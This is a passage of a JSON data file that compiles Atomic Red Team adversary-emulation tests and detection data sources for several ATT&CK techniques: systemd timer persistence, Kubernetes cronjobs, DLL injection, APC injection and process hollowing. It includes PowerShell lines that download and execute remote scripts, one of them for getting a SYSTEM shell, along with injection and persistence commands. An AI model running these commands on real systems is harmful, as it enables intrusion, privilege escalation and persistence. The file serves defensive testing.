#{path_to_systemd_timer}\necho \"[Timer]\" >> #{path_to_systemd_timer}\necho \"Unit=#{systemd_service_name}\" >> #{path_to_systemd_timer}\necho \"OnCalendar=*-*-* *:*:00\" >> #{path_to_systemd_timer}\necho \"[Install]\" >> #{path_to_systemd_timer}\necho \"WantedBy=timers.target\" >> #{path_to_systemd_timer}\nsystemctl start art-timer.timer\nsystemctl enable art-timer.timer\nsystemctl daemon-reload\n", + "systemd-run --user --unit=Atomic-Red-Team --on-calendar '*:0/1' /bin/sh -c 'echo \"$(date) $(whoami)\" >>/tmp/log'\n", + "systemd-run --unit=Atomic-Red-Team --on-calendar '*:0/1' /bin/sh -c 'echo \"$(date) $(whoami)\" >>/tmp/log'\n" + ], + "commands": [ + { + "command": "echo \"[Unit]\" > /etc/systemd/system/art-timer.service\necho \"Description=Atomic Red Team Systemd Timer Service\" >> /etc/systemd/system/art-timer.service\necho \"[Service]\" >> /etc/systemd/system/art-timer.service\necho \"Type=simple\" >> /etc/systemd/system/art-timer.service\necho \"ExecStart=/bin/touch /tmp/art-systemd-timer-marker\" >> /etc/systemd/system/art-timer.service\necho \"[Install]\" >> /etc/systemd/system/art-timer.service\necho \"WantedBy=multi-user.target\" >> /etc/systemd/system/art-timer.service\necho \"[Unit]\" > #{path_to_systemd_timer}\necho \"Description=Executes Atomic Red Team Systemd Timer Service\" >> #{path_to_systemd_timer}\necho \"Requires=#{systemd_service_name}\" >> #{path_to_systemd_timer}\necho \"[Timer]\" >> #{path_to_systemd_timer}\necho \"Unit=#{systemd_service_name}\" >> #{path_to_systemd_timer}\necho \"OnCalendar=*-*-* *:*:00\" >> #{path_to_systemd_timer}\necho \"[Install]\" >> #{path_to_systemd_timer}\necho \"WantedBy=timers.target\" >> #{path_to_systemd_timer}\nsystemctl start #{systemd_timer_name}\nsystemctl enable #{systemd_timer_name}\nsystemctl daemon-reload\n", + "source": "atomics/T1053.006/T1053.006.yaml", + "name": "Atomic Red Team Test - Scheduled Task/Job: Systemd Timers" + }, + { + "command": "echo \"[Unit]\" > #{path_to_systemd_service}\necho \"Description=Atomic Red Team Systemd Timer Service\" >> #{path_to_systemd_service}\necho \"[Service]\" >> #{path_to_systemd_service}\necho \"Type=simple\" >> #{path_to_systemd_service}\necho \"ExecStart=/bin/touch /tmp/art-systemd-timer-marker\" >> #{path_to_systemd_service}\necho \"[Install]\" >> #{path_to_systemd_service}\necho \"WantedBy=multi-user.target\" >> #{path_to_systemd_service}\necho \"[Unit]\" > /etc/systemd/system/art-timer.timer\necho \"Description=Executes Atomic Red Team Systemd Timer Service\" >> /etc/systemd/system/art-timer.timer\necho \"Requires=#{systemd_service_name}\" >> /etc/systemd/system/art-timer.timer\necho \"[Timer]\" >> /etc/systemd/system/art-timer.timer\necho \"Unit=#{systemd_service_name}\" >> /etc/systemd/system/art-timer.timer\necho \"OnCalendar=*-*-* *:*:00\" >> /etc/systemd/system/art-timer.timer\necho \"[Install]\" >> /etc/systemd/system/art-timer.timer\necho \"WantedBy=timers.target\" >> /etc/systemd/system/art-timer.timer\nsystemctl start #{systemd_timer_name}\nsystemctl enable #{systemd_timer_name}\nsystemctl daemon-reload\n", + "source": "atomics/T1053.006/T1053.006.yaml", + "name": "Atomic Red Team Test - Scheduled Task/Job: Systemd Timers" + }, + { + "command": "echo \"[Unit]\" > #{path_to_systemd_service}\necho \"Description=Atomic Red Team Systemd Timer Service\" >> #{path_to_systemd_service}\necho \"[Service]\" >> #{path_to_systemd_service}\necho \"Type=simple\" >> #{path_to_systemd_service}\necho \"ExecStart=/bin/touch /tmp/art-systemd-timer-marker\" >> #{path_to_systemd_service}\necho \"[Install]\" >> #{path_to_systemd_service}\necho \"WantedBy=multi-user.target\" >> #{path_to_systemd_service}\necho \"[Unit]\" > #{path_to_systemd_timer}\necho \"Description=Executes Atomic Red Team Systemd Timer Service\" >> #{path_to_systemd_timer}\necho \"Requires=art-timer.service\" >> #{path_to_systemd_timer}\necho \"[Timer]\" >> #{path_to_systemd_timer}\necho \"Unit=art-timer.service\" >> #{path_to_systemd_timer}\necho \"OnCalendar=*-*-* *:*:00\" >> #{path_to_systemd_timer}\necho \"[Install]\" >> #{path_to_systemd_timer}\necho \"WantedBy=timers.target\" >> #{path_to_systemd_timer}\nsystemctl start #{systemd_timer_name}\nsystemctl enable #{systemd_timer_name}\nsystemctl daemon-reload\n", + "source": "atomics/T1053.006/T1053.006.yaml", + "name": "Atomic Red Team Test - Scheduled Task/Job: Systemd Timers" + }, + { + "command": "echo \"[Unit]\" > #{path_to_systemd_service}\necho \"Description=Atomic Red Team Systemd Timer Service\" >> #{path_to_systemd_service}\necho \"[Service]\" >> #{path_to_systemd_service}\necho \"Type=simple\" >> #{path_to_systemd_service}\necho \"ExecStart=/bin/touch /tmp/art-systemd-timer-marker\" >> #{path_to_systemd_service}\necho \"[Install]\" >> #{path_to_systemd_service}\necho \"WantedBy=multi-user.target\" >> #{path_to_systemd_service}\necho \"[Unit]\" > #{path_to_systemd_timer}\necho \"Description=Executes Atomic Red Team Systemd Timer Service\" >> #{path_to_systemd_timer}\necho \"Requires=#{systemd_service_name}\" >> #{path_to_systemd_timer}\necho \"[Timer]\" >> #{path_to_systemd_timer}\necho \"Unit=#{systemd_service_name}\" >> #{path_to_systemd_timer}\necho \"OnCalendar=*-*-* *:*:00\" >> #{path_to_systemd_timer}\necho \"[Install]\" >> #{path_to_systemd_timer}\necho \"WantedBy=timers.target\" >> #{path_to_systemd_timer}\nsystemctl start art-timer.timer\nsystemctl enable art-timer.timer\nsystemctl daemon-reload\n", + "source": "atomics/T1053.006/T1053.006.yaml", + "name": "Atomic Red Team Test - Scheduled Task/Job: Systemd Timers" + }, + { + "command": "systemd-run --user --unit=Atomic-Red-Team --on-calendar '*:0/1' /bin/sh -c 'echo \"$(date) $(whoami)\" >>/tmp/log'\n", + "source": "atomics/T1053.006/T1053.006.yaml", + "name": "Atomic Red Team Test - Scheduled Task/Job: Systemd Timers" + }, + { + "command": "systemd-run --unit=Atomic-Red-Team --on-calendar '*:0/1' /bin/sh -c 'echo \"$(date) $(whoami)\" >>/tmp/log'\n", + "source": "atomics/T1053.006/T1053.006.yaml", + "name": "Atomic Red Team Test - Scheduled Task/Job: Systemd Timers" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1053.006", + "display_name": "Scheduled Task/Job: Systemd Timers", + "atomic_tests": [ + { + "name": "Create Systemd Service and Timer", + "auto_generated_guid": "f4983098-bb13-44fb-9b2c-46149961807b", + "description": "This test creates Systemd service and timer then starts and enables the Systemd timer \n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "path_to_systemd_service": { + "description": "Path to systemd service unit file", + "type": "Path", + "default": "/etc/systemd/system/art-timer.service" + }, + "path_to_systemd_timer": { + "description": "Path to service timer file", + "type": "Path", + "default": "/etc/systemd/system/art-timer.timer" + }, + "systemd_service_name": { + "description": "Name of systemd service", + "type": "String", + "default": "art-timer.service" + }, + "systemd_timer_name": { + "description": "Name of systemd service timer", + "type": "String", + "default": "art-timer.timer" + } + }, + "executor": { + "command": "echo \"[Unit]\" > #{path_to_systemd_service}\necho \"Description=Atomic Red Team Systemd Timer Service\" >> #{path_to_systemd_service}\necho \"[Service]\" >> #{path_to_systemd_service}\necho \"Type=simple\" >> #{path_to_systemd_service}\necho \"ExecStart=/bin/touch /tmp/art-systemd-timer-marker\" >> #{path_to_systemd_service}\necho \"[Install]\" >> #{path_to_systemd_service}\necho \"WantedBy=multi-user.target\" >> #{path_to_systemd_service}\necho \"[Unit]\" > #{path_to_systemd_timer}\necho \"Description=Executes Atomic Red Team Systemd Timer Service\" >> #{path_to_systemd_timer}\necho \"Requires=#{systemd_service_name}\" >> #{path_to_systemd_timer}\necho \"[Timer]\" >> #{path_to_systemd_timer}\necho \"Unit=#{systemd_service_name}\" >> #{path_to_systemd_timer}\necho \"OnCalendar=*-*-* *:*:00\" >> #{path_to_systemd_timer}\necho \"[Install]\" >> #{path_to_systemd_timer}\necho \"WantedBy=timers.target\" >> #{path_to_systemd_timer}\nsystemctl start #{systemd_timer_name}\nsystemctl enable #{systemd_timer_name}\nsystemctl daemon-reload\n", + "cleanup_command": "systemctl stop #{systemd_timer_name}\nsystemctl disable #{systemd_timer_name}\nrm #{path_to_systemd_service}\nrm #{path_to_systemd_timer}\nsystemctl daemon-reload\n", + "name": "bash" + } + }, + { + "name": "Create a user level transient systemd service and timer", + "auto_generated_guid": "3de33f5b-62e5-4e63-a2a0-6fd8808c80ec", + "description": "Schedule a user level transient task (will not survive a reboot) without having to create the .timer or .service files by using the systemd-run command. \n", + "supported_platforms": [ + "linux" + ], + "dependency_executor_name": "sh", + "dependencies": [ + { + "description": "Check if systemd-run exists on the machine\n", + "prereq_command": "if [ -x \"$(command -v systemd-run)\" ]; then exit 0; else exit 1; fi;\n", + "get_prereq_command": "echo \"Install systemd on the machine.\"; exit 1;\n" + } + ], + "executor": { + "elevation_required": false, + "command": "systemd-run --user --unit=Atomic-Red-Team --on-calendar '*:0/1' /bin/sh -c 'echo \"$(date) $(whoami)\" >>/tmp/log'\n", + "cleanup_command": "systemctl --user stop Atomic-Red-Team.service\nsystemctl --user stop Atomic-Red-Team.timer\nrm /tmp/log\n", + "name": "sh" + } + }, + { + "name": "Create a system level transient systemd service and timer", + "auto_generated_guid": "d3eda496-1fc0-49e9-aff5-3bec5da9fa22", + "description": "Schedule a system level transient task (will not survive a reboot) without having to create the .timer or .service files by using the systemd-run command. \n", + "supported_platforms": [ + "linux" + ], + "dependency_executor_name": "sh", + "dependencies": [ + { + "description": "Check if systemd-run exists on the machine\n", + "prereq_command": "if [ -x \"$(command -v systemd-run)\" ]; then exit 0; else exit 1; fi;\n", + "get_prereq_command": "echo \"Install systemd on the machine.\"; exit 1;\n" + } + ], + "executor": { + "elevation_required": true, + "command": "systemd-run --unit=Atomic-Red-Team --on-calendar '*:0/1' /bin/sh -c 'echo \"$(date) $(whoami)\" >>/tmp/log'\n", + "cleanup_command": "systemctl stop Atomic-Red-Team.service\nsystemctl stop Atomic-Red-Team.timer\nrm /tmp/log\n", + "name": "sh" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "scheduled job", + "definition": "Information about scheduled work that run automatically in the background of a computer system (Cron deamon, Task Scheduler, BITS).", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Containers" + ], + "data_component": "scheduled job creation", + "description": "A scheduled job was created, either locally or remotely.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "scheduled job" + }, + { + "data_source": "scheduled job", + "definition": "Information about scheduled work that run automatically in the background of a computer system (Cron deamon, Task Scheduler, BITS).", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Containers" + ], + "data_component": "scheduled job creation", + "description": "A scheduled job was created, either locally or remotely.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "scheduled job" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/taskschd/tasks" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ] + ] + }, + { + "technique_id": "T1053.007", + "command_list": [ + "kubectl get cronjobs -n default\n", + "kubectl create -f src/cronjob.yaml -n default\n" + ], + "commands": [ + { + "command": "kubectl get cronjobs -n default\n", + "source": "atomics/T1053.007/T1053.007.yaml", + "name": "Atomic Red Team Test - Kubernetes Cronjob" + }, + { + "command": "kubectl create -f src/cronjob.yaml -n default\n", + "source": "atomics/T1053.007/T1053.007.yaml", + "name": "Atomic Red Team Test - Kubernetes Cronjob" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1053.007", + "display_name": "Kubernetes Cronjob", + "atomic_tests": [ + { + "name": "ListCronjobs", + "auto_generated_guid": "ddfb0bc1-3c3f-47e9-a298-550ecfefacbd", + "description": "Kubernetes Job is a controller that creates one or more pods and ensures that a specified number of them successfully terminate. Kubernetes Job can be used to run containers that perform finite tasks for batch jobs. Kubernetes CronJob is used to schedule Jobs. Attackers may use Kubernetes CronJob for scheduling execution of malicious code that would run as a container in the cluster.\n", + "supported_platforms": [ + "containers" + ], + "input_arguments": { + "namespace": { + "description": "K8s namespace to list", + "type": "String", + "default": "default" + } + }, + "dependencies": [ + { + "description": "kubectl must be installed\n", + "get_prereq_command": "echo \"kubectl must be installed manually\"\n", + "prereq_command": "which kubectl\n" + } + ], + "executor": { + "command": "kubectl get cronjobs -n #{namespace}\n", + "name": "bash", + "elevation_required": false + } + }, + { + "name": "CreateCronjob", + "auto_generated_guid": "f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3", + "description": "Kubernetes Job is a controller that creates one or more pods and ensures that a specified number of them successfully terminate. Kubernetes Job can be used to run containers that perform finite tasks for batch jobs. Kubernetes CronJob is used to schedule Jobs. Attackers may use Kubernetes CronJob for scheduling execution of malicious code that would run as a container in the cluster.\n", + "supported_platforms": [ + "containers" + ], + "input_arguments": { + "namespace": { + "description": "K8s namespace to list", + "type": "String", + "default": "default" + } + }, + "dependencies": [ + { + "description": "kubectl must be installed\n", + "get_prereq_command": "echo \"kubectl must be installed manually\"\n", + "prereq_command": "which kubectl\n" + } + ], + "executor": { + "command": "kubectl create -f src/cronjob.yaml -n #{namespace}\n", + "cleanup_command": "kubectl delete cronjob art -n #{namespace}\n", + "name": "bash", + "elevation_required": false + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "scheduled job", + "definition": "Information about scheduled work that run automatically in the background of a computer system (Cron deamon, Task Scheduler, BITS).", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Containers" + ], + "data_component": "scheduled job creation", + "description": "A scheduled job was created, either locally or remotely.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "scheduled job" + }, + { + "data_source": "scheduled job", + "definition": "Information about scheduled work that run automatically in the background of a computer system (Cron deamon, Task Scheduler, BITS).", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Containers" + ], + "data_component": "scheduled job creation", + "description": "A scheduled job was created, either locally or remotely.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "scheduled job" + }, + { + "data_source": "container", + "definition": "Information about a container within an environment.", + "collection_layers": [ + "container" + ], + "data_source_platform": [ + "Containers" + ], + "data_component": "container creation", + "description": "A container was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "container" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file creation", + "description": "A file was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/taskschd/tasks" + ], + [ + "https://docs.docker.com/engine/api/v1.41/#tag/Container" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ] + ] + }, + { + "technique_id": "T1055.001", + "command_list": [ + "$mypid = (Start-Process notepad -PassThru).id\nmavinject $mypid /INJECTRUNNING #{dll_payload}\nStop-Process -processname notepad\n", + "$mypid = #{process_id}\nmavinject $mypid /INJECTRUNNING PathToAtomicsFolder\\T1055.001\\src\\x64\\T1055.001.dll\nStop-Process -processname notepad\n", + "iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/Get-System-Techniques/master/UsoDLL/Get-UsoClientDLLSystem.ps1')", + "odbcconf.exe /S /A {REGSVR \"C:\\Users\\Public\\sandcat.dll\"}\n" + ], + "commands": [ + { + "command": "$mypid = (Start-Process notepad -PassThru).id\nmavinject $mypid /INJECTRUNNING #{dll_payload}\nStop-Process -processname notepad\n", + "source": "atomics/T1055.001/T1055.001.yaml", + "name": "Atomic Red Team Test - Process Injection: Dynamic-link Library Injection" + }, + { + "command": "$mypid = #{process_id}\nmavinject $mypid /INJECTRUNNING PathToAtomicsFolder\\T1055.001\\src\\x64\\T1055.001.dll\nStop-Process -processname notepad\n", + "source": "atomics/T1055.001/T1055.001.yaml", + "name": "Atomic Red Team Test - Process Injection: Dynamic-link Library Injection" + }, + { + "command": "iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/Get-System-Techniques/master/UsoDLL/Get-UsoClientDLLSystem.ps1')", + "source": "atomics/T1055.001/T1055.001.yaml", + "name": "Atomic Red Team Test - Process Injection: Dynamic-link Library Injection" + }, + { + "command": "odbcconf.exe /S /A {REGSVR \"C:\\Users\\Public\\sandcat.dll\"}\n", + "source": "data/abilities/defense-evasion/a74bc239-a196-4f7e-8d5c-fe8c0266071c.yml", + "name": "Leverage odbcconf for DLL injection" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1055.001", + "display_name": "Process Injection: Dynamic-link Library Injection", + "atomic_tests": [ + { + "name": "Process Injection via mavinject.exe", + "auto_generated_guid": "74496461-11a1-4982-b439-4d87a550d254", + "description": "Windows 10 Utility To Inject DLLS.\n\nUpon successful execution, powershell.exe will download T1055.dll to disk. Powershell will then spawn mavinject.exe to perform process injection in T1055.dll.\nWith default arguments, expect to see a MessageBox, with notepad's icon in taskbar.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "process_id": { + "description": "PID of input_arguments", + "type": "Integer", + "default": "(Start-Process notepad -PassThru).id" + }, + "dll_payload": { + "description": "DLL to Inject", + "type": "Path", + "default": "PathToAtomicsFolder\\T1055.001\\src\\x64\\T1055.001.dll" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Utility to inject must exist on disk at specified location (#{dll_payload})\n", + "prereq_command": "if (Test-Path #{dll_payload}) {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1055.001/src/x64/T1055.001.dll\" -OutFile \"#{dll_payload}\"\n" + } + ], + "executor": { + "command": "$mypid = #{process_id}\nmavinject $mypid /INJECTRUNNING #{dll_payload}\nStop-Process -processname notepad\n", + "name": "powershell", + "elevation_required": true + } + }, + { + "name": "WinPwn - Get SYSTEM shell - Bind System Shell using UsoClient DLL load technique", + "auto_generated_guid": "8b56f787-73d9-4f1d-87e8-d07e89cbc7f5", + "description": "Get SYSTEM shell - Bind System Shell using UsoClient DLL load technique via function of WinPwn", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/Get-System-Techniques/master/UsoDLL/Get-UsoClientDLLSystem.ps1')", + "name": "powershell" + } + } + ] + }, + { + "id": "a74bc239-a196-4f7e-8d5c-fe8c0266071c", + "name": "Signed Binary Execution - odbcconf", + "description": "Leverage odbcconf for DLL injection", + "tactic": "defense-evasion", + "technique": { + "attack_id": "T1055.001", + "name": "Process Injection: Dynamic-link Library Injection" + }, + "platforms": { + "windows": { + "psh": { + "command": "odbcconf.exe /S /A {REGSVR \"C:\\Users\\Public\\sandcat.dll\"}\n" + } + } + } + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "module", + "definition": "Information about module files consisting of one or more classes and interfaces, such as portable executable (PE) format executables/dynamic link libraries (DLL), executable and linkable format (ELF) executables/shared libraries, and Mach-O format executables/shared libraries.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "module load", + "description": "A module was loaded into a process.", + "source_data_element": "process", + "relationship": "loaded", + "target_data_element": "module" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "api call" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "system call" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process access", + "description": "A process was accessed.", + "source_data_element": "process", + "relationship": "accessed", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process access", + "description": "A process was accessed.", + "source_data_element": "process", + "relationship": "requested access to", + "target_data_element": "process" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-loadlibrarya", + "https://docs.microsoft.com/en-us/dotnet/api/system.reflection.module?view=netcore-3.1", + "https://docs.microsoft.com/en-us/windows/win32/debug/pe-format", + "https://elinux.org/Executable_and_Linkable_Format_(ELF)" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ] + ] + }, + { + "technique_id": "T1055.004", + "command_list": [ + "PathToAtomicsFolder\\T1055.004\\bin\\T1055.exe\n" + ], + "commands": [ + { + "command": "PathToAtomicsFolder\\T1055.004\\bin\\T1055.exe\n", + "source": "atomics/T1055.004/T1055.004.yaml", + "name": "Atomic Red Team Test - Process Injection: Asynchronous Procedure Call" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1055.004", + "display_name": "Process Injection: Asynchronous Procedure Call", + "atomic_tests": [ + { + "name": "Process Injection via C#", + "auto_generated_guid": "611b39b7-e243-4c81-87a4-7145a90358b1", + "description": "Process Injection using C#\nreference: https://github.com/pwndizzle/c-sharp-memory-injection\nExcercises Five Techniques\n1. Process injection\n2. ApcInjectionAnyProcess\n3. ApcInjectionNewProcess\n4. IatInjection\n5. ThreadHijack\nUpon successful execution, cmd.exe will execute T1055.exe, which exercises 5 techniques. Output will be via stdout.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "exe_binary": { + "description": "Output Binary", + "type": "Path", + "default": "PathToAtomicsFolder\\T1055.004\\bin\\T1055.exe" + } + }, + "executor": { + "command": "#{exe_binary}\n", + "name": "command_prompt" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "api call" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "system call" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process access", + "description": "A process was accessed.", + "source_data_element": "process", + "relationship": "accessed", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process access", + "description": "A process was accessed.", + "source_data_element": "process", + "relationship": "requested access to", + "target_data_element": "process" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ] + ] + }, + { + "technique_id": "T1055.012", + "command_list": [ + ". $PathToAtomicsFolder\\T1055.012\\src\\Start-Hollow.ps1\n$ppid=Get-Process #{parent_process_name} | select -expand id\nStart-Hollow -Sponsor \"#{sponsor_binary_path}\" -Hollow \"C:\\Windows\\System32\\cmd.exe\" -ParentPID $ppid -Verbose\n", + ". $PathToAtomicsFolder\\T1055.012\\src\\Start-Hollow.ps1\n$ppid=Get-Process explorer | select -expand id\nStart-Hollow -Sponsor \"#{sponsor_binary_path}\" -Hollow \"#{hollow_binary_path}\" -ParentPID $ppid -Verbose\n", + ". $PathToAtomicsFolder\\T1055.012\\src\\Start-Hollow.ps1\n$ppid=Get-Process #{parent_process_name} | select -expand id\nStart-Hollow -Sponsor \"C:\\Windows\\System32\\notepad.exe\" -Hollow \"#{hollow_binary_path}\" -ParentPID $ppid -Verbose\n", + ". $PathToAtomicsFolder\\T1055.012\\src\\Start-Hollow.ps1\n$ppid=Get-Process #{parent_process_name} | select -expand id\nStart-Hollow -Sponsor \"#{sponsor_binary_path}\" -Hollow \"#{hollow_binary_path}\" -ParentPID $ppid -Verbose\n", + "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\" -UseBasicParsing) \nInvoke-MalDoc -macroFile \"PathToAtomicsFolder\\T1055.012\\src\\T1055.012-macrocode.txt\" -officeProduct \"Word\" -sub \"Exploit\"\n" + ], + "commands": [ + { + "command": ". $PathToAtomicsFolder\\T1055.012\\src\\Start-Hollow.ps1\n$ppid=Get-Process #{parent_process_name} | select -expand id\nStart-Hollow -Sponsor \"#{sponsor_binary_path}\" -Hollow \"C:\\Windows\\System32\\cmd.exe\" -ParentPID $ppid -Verbose\n", + "source": "atomics/T1055.012/T1055.012.yaml", + "name": "Atomic Red Team Test - Process Injection: Process Hollowing" + }, + { + "command": ". $PathToAtomicsFolder\\T1055.012\\src\\Start-Hollow.ps1\n$ppid=Get-Process explorer | select -expand id\nStart-Hollow -Sponsor \"#{sponsor_binary_path}\" -Hollow \"#{hollow_binary_path}\" -ParentPID $ppid -Verbose\n", + "source": "atomics/T1055.012/T1055.012.yaml", + "name": "Atomic Red Team Test - Process Injection: Process Hollowing" + }, + { + "command": ". $PathToAtomicsFolder\\T1055.012\\src\\Start-Hollow.ps1\n$ppid=Get-Process #{parent_process_name} | select -expand id\nStart-Hollow -Sponsor \"C:\\Windows\\System32\\notepad.exe\" -Hollow \"#{hollow_binary_path}\" -ParentPID $ppid -Verbose\n", + "source": "atomics/T1055.012/T1055.012.yaml", + "name": "Atomic Red Team Test - Process Injection: Process Hollowing" + }, + { + "command": ". $PathToAtomicsFolder\\T1055.012\\src\\Start-Hollow.ps1\n$ppid=Get-Process #{parent_process_name} | select 